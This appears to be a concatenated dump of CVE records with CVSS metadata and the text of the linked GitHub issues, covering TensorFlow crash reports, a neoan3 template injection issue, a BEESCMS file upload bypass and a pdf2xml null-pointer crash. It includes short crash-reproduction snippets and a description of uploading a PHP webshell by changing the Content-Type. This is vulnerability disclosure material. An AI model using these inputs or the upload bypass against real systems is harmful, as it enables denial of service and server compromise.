"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/874bda09e6702cd50bac90b453b50bcc65b2769e"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46909"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gh8h-7j2j-qv4f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/874bda09e6702cd50bac90b453b50bcc65b2769e"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46909"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gh8h-7j2j-qv4f"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910",
"versionEndExcluding": "2.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:2.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "651EA851-E660-4E53-9F3E-B6B69D91326B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/tensorflow/tensorflow/issues/46909 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow installed from (source or binary): binary
- TensorFlow version (use command below):2.1.0
- Python version:3.7.6
- Bazel version (if compiling from source):N/A
- GCC/Compiler version (if compiling from source):N/A
- CUDA/cuDNN version:N/A
- GPU model and memory:N/A
**Describe the current behavior**
`tf.summary.create_file_writer` crash (abort)
**Describe the expected behavior**
expect an exception message if the input unexpected instead of crash.
**Standalone code to reproduce the issue**
~~~python
import tensorflow as tf
import numpy as np
tf.summary.create_file_writer(logdir='', flush_millis=np.ones((1,2)))
~~~
Output:
~~~python
2021-02-04 03:59:32.339427: F tensorflow/core/framework/tensor.cc:669] Check failed: 1 == NumElements() (1 vs. 2)Must have a one element tensor
Aborted (core dumped)
~~~
| tf.summary.create_file_writer aborts | https://api.github.com/repos/tensorflow/tensorflow/issues/46909/comments | 4 | 2021-02-04T03:59:44Z | 2021-08-31T23:59:30Z | https://github.com/tensorflow/tensorflow/issues/46909 | 800,906,740 | 46,909 | 2,767 |
CVE-2021-41202 | 2021-11-05T22:15:08.323 | TensorFlow is an open source platform for machine learning. In affected versions while calculating the size of the output within the `tf.range` kernel, there is a conditional statement of type `int64 = condition ? int64 : double`. Due to C++ implicit conversion rules, both branches of the condition will be cast to `double` and the result would be truncated before the assignment. This result in overflows. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46889"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46912"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xrqm-fpgr-6hhx"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46889"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46912"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xrqm-fpgr-6hhx"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0E596567-6F67-4880-8EC4-CB262BF02E0D",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910",
"versionEndExcluding": "2.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C",
"versionEndExcluding": "2.6.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:2.7.0:rc0:*:*:*:*:*:*",
"matchCriteriaId": "A58EDA5C-66D6-46F1-962E-60AFB7C784A7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:2.7.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "89522760-C2DF-400D-9624-626D8F160CBA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"681"
] | 681 | https://github.com/tensorflow/tensorflow/issues/46889 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow installed from (source or binary): binary
- TensorFlow version (use command below):2.1.0
- Python version:3.7.6
- Bazel version (if compiling from source):N/A
- GCC/Compiler version (if compiling from source):N/A
- CUDA/cuDNN version:N/A
- GPU model and memory:N/A
-
**Describe the current behavior**
`tf.keras.backend.arange` crash (abort) when `start` is large
**Describe the expected behavior**
expect no crash
**Standalone code to reproduce the issue**
~~~python
import tensorflow as tf
tf.keras.backend.arange(start=1e+38)
~~~
Output:
~~~python
2021-02-03 16:53:49.181545: F tensorflow/core/framework/tensor_shape.cc:187] Non-OK-status: InitDims(dim_sizes) status: Internal: Expected shape dimensions to be non-negative, got -9223372036854775808
Aborted (core dumped)
~~~ | tf.keras.backend.arange crash (abort) when start is large | https://api.github.com/repos/tensorflow/tensorflow/issues/46889/comments | 4 | 2021-02-03T16:54:54Z | 2021-08-30T20:46:03Z | https://github.com/tensorflow/tensorflow/issues/46889 | 800,513,778 | 46,889 | 2,768 |
CVE-2021-41202 | 2021-11-05T22:15:08.323 | TensorFlow is an open source platform for machine learning. In affected versions while calculating the size of the output within the `tf.range` kernel, there is a conditional statement of type `int64 = condition ? int64 : double`. Due to C++ implicit conversion rules, both branches of the condition will be cast to `double` and the result would be truncated before the assignment. This result in overflows. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46889"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46912"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xrqm-fpgr-6hhx"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46889"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46912"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xrqm-fpgr-6hhx"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0E596567-6F67-4880-8EC4-CB262BF02E0D",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910",
"versionEndExcluding": "2.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C",
"versionEndExcluding": "2.6.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:2.7.0:rc0:*:*:*:*:*:*",
"matchCriteriaId": "A58EDA5C-66D6-46F1-962E-60AFB7C784A7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:2.7.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "89522760-C2DF-400D-9624-626D8F160CBA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"681"
] | 681 | https://github.com/tensorflow/tensorflow/issues/46912 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow installed from (source or binary): binary
- TensorFlow version (use command below):2.1.0
- Python version:3.7.6
- Bazel version (if compiling from source):N/A
- GCC/Compiler version (if compiling from source):N/A
- CUDA/cuDNN version:N/A
- GPU model and memory:N/A
**Describe the current behavior**
`tf.sparse.eye` crashes(aborts) when `num_rows` contains large number
**Describe the expected behavior**
expect an exception message if the input unexpected instead of crash.
**Standalone code to reproduce the issue**
~~~python
import tensorflow as tf
import numpy as np
tf.sparse.eye(num_rows=9223372036854775807, num_columns=None)
~~~
Output
~~~python
2021-02-04 04:36:57.184236: F tensorflow/core/framework/tensor_shape.cc:345] Check failed: size >= 0 (-9223372036854775808 vs. 0)
Aborted (core dumped)
~~~ | `tf.sparse.eye` crashes(aborts) when num_rows contains large number | https://api.github.com/repos/tensorflow/tensorflow/issues/46912/comments | 4 | 2021-02-04T04:39:54Z | 2021-08-19T04:41:31Z | https://github.com/tensorflow/tensorflow/issues/46912 | 800,924,135 | 46,912 | 2,769 |
CVE-2021-41170 | 2021-11-08T19:15:07.640 | neoan3-apps/template is a neoan3 minimal template engine. Versions prior to 1.1.1 have allowed for passing in closures directly into the template engine. As a result values that are callable are executed by the template engine. The issue arises if a value has the same name as a method or function in scope and can therefore be executed either by mistake or maliciously. In theory all users of the package are affected as long as they either deal with direct user input or database values. A multi-step attack on is therefore plausible. Version 1.1.1 has addressed this vulnerability. Unfortunately only working with hardcoded values is safe in prior versions. As this likely defeats the purpose of a template engine, please upgrade. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/sroehrl/neoan3-template/commit/4a2c9570f071d3c8f4ac790007599cba20e16934"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/sroehrl/neoan3-template/issues/8"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/sroehrl/neoan3-template/security/advisories/GHSA-3v56-q6r6-4gcw"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/sroehrl/neoan3-template/commit/4a2c9570f071d3c8f4ac790007599cba20e16934"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/sroehrl/neoan3-template/issues/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/sroehrl/neoan3-template/security/advisories/GHSA-3v56-q6r6-4gcw"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:neoan:neoan3-template:*:*:*:*:*:*:*:*",
"matchCriteriaId": "70999503-021D-444B-95AD-548CE2C0E680",
"versionEndExcluding": "1.1.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"732"
] | 732 | https://github.com/sroehrl/neoan3-template/issues/8 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"sroehrl",
"neoan3-template"
] | In the template evaluation, closures are evaluated based on whether a value is callable within the current scope.
In theory, one could create a multi-step attack by storing particular values into the database that are known to be eventually rendered by the template engine. would the value of such a key happen to be a callable, one could execute global or local functions & methods. While it is unclear how one could use this to exploit neoan3, this constitutes a security concern. | Closure injection has a vulnerability | https://api.github.com/repos/sroehrl/neoan3-template/issues/8/comments | 0 | 2021-10-21T23:24:03Z | 2021-10-21T23:48:25Z | https://github.com/sroehrl/neoan3-template/issues/8 | 1,033,019,897 | 8 | 2,770 |
CVE-2020-23572 | 2021-11-08T21:15:07.527 | BEESCMS v4.0 was discovered to contain an arbitrary file upload vulnerability via the component /admin/upload.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/source-trace/beescms/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/source-trace/beescms/issues/6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:beescms:beescms:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "25C27AEE-DD4E-4006-8DD1-E4A6160F4D43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/source-trace/beescms/issues/6 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"source-trace",
"beescms"
] | Let's take a look at the code

Because the system does not strictly filter and restrict the pictures uploaded by users, resulting in file upload vulnerabilities. From the code, it can be seen that only the size of the picture and the Content-Type and so on are verified during the upload, so only need to modify the Content-Type to bypass Upload.
After the administrator logged in, open the following one page.

Upload php.php and grab the package to modify the Content-Type to "image/jpg"

Then we can see that php.php was successfully uploaded.
Then we access the uploaded file

| There is a file upload vulnerability so that the webshell can be obtained | https://api.github.com/repos/source-trace/beescms/issues/6/comments | 0 | 2020-06-08T06:58:15Z | 2020-06-08T06:58:15Z | https://github.com/source-trace/beescms/issues/6 | 634,257,773 | 6 | 2,771 |
CVE-2020-23872 | 2021-11-10T22:15:07.470 | A NULL pointer dereference in the function TextPage::restoreState of pdf2xml v2.0 allows attackers to cause a denial of service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt2/pdf2xml/issues/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt2/pdf2xml/issues/10"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/kermitt2/pdf2xml/issues/10 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kermitt2",
"pdf2xml"
] | $ gdb ./pdf2xml
(gdb) r 01-NULL-pointer-dereference-TextPage-restoreState test.xml
[00-NULL-pointer-dereference-TextPage-restoreState.pdf](https://github.com/kermitt2/pdf2xml/files/4876379/00-NULL-pointer-dereference-TextPage-restoreState.pdf)
Program received signal SIGSEGV, Segmentation fault.
0x000000000040e29b in TextPage::restoreState (state=0x7a02a0, this=0x7a2100) at /home/test/pdf2xml/src/XmlOutputDev.cc:2765
2765 idCur = idStack.top();
(gdb) bt
#0 0x000000000040e29b in TextPage::restoreState (state=0x7a02a0, this=0x7a2100) at /home/test/pdf2xml/src/XmlOutputDev.cc:2765
#1 XmlOutputDev::restoreState (this=<optimized out>, state=0x7a02a0) at /home/test/pdf2xml/src/XmlOutputDev.cc:4333
#2 0x000000000049983b in Gfx::execOp (this=this@entry=0x7a0140, cmd=cmd@entry=0x7fffffffdf20, args=args@entry=0x7fffffffdf30, numArgs=numArgs@entry=0) at /home/test/pdf2xml/xpdf/xpdf/Gfx.cc:834
#3 0x0000000000499a4f in Gfx::go (this=this@entry=0x7a0140, topLevel=topLevel@entry=1) at /home/test/pdf2xml/xpdf/xpdf/Gfx.cc:709
#4 0x0000000000499e66 in Gfx::display (this=this@entry=0x7a0140, objRef=objRef@entry=0x7a0120, topLevel=topLevel@entry=1) at /home/test/pdf2xml/xpdf/xpdf/Gfx.cc:642
#5 0x0000000000465f23 in Page::displaySlice (this=0x7a00f0, out=0x79eae0, out@entry=0x0, hDPI=72, hDPI@entry=0, vDPI=72, vDPI@entry=3.9364818670782154e-317, rotate=<optimized out>,
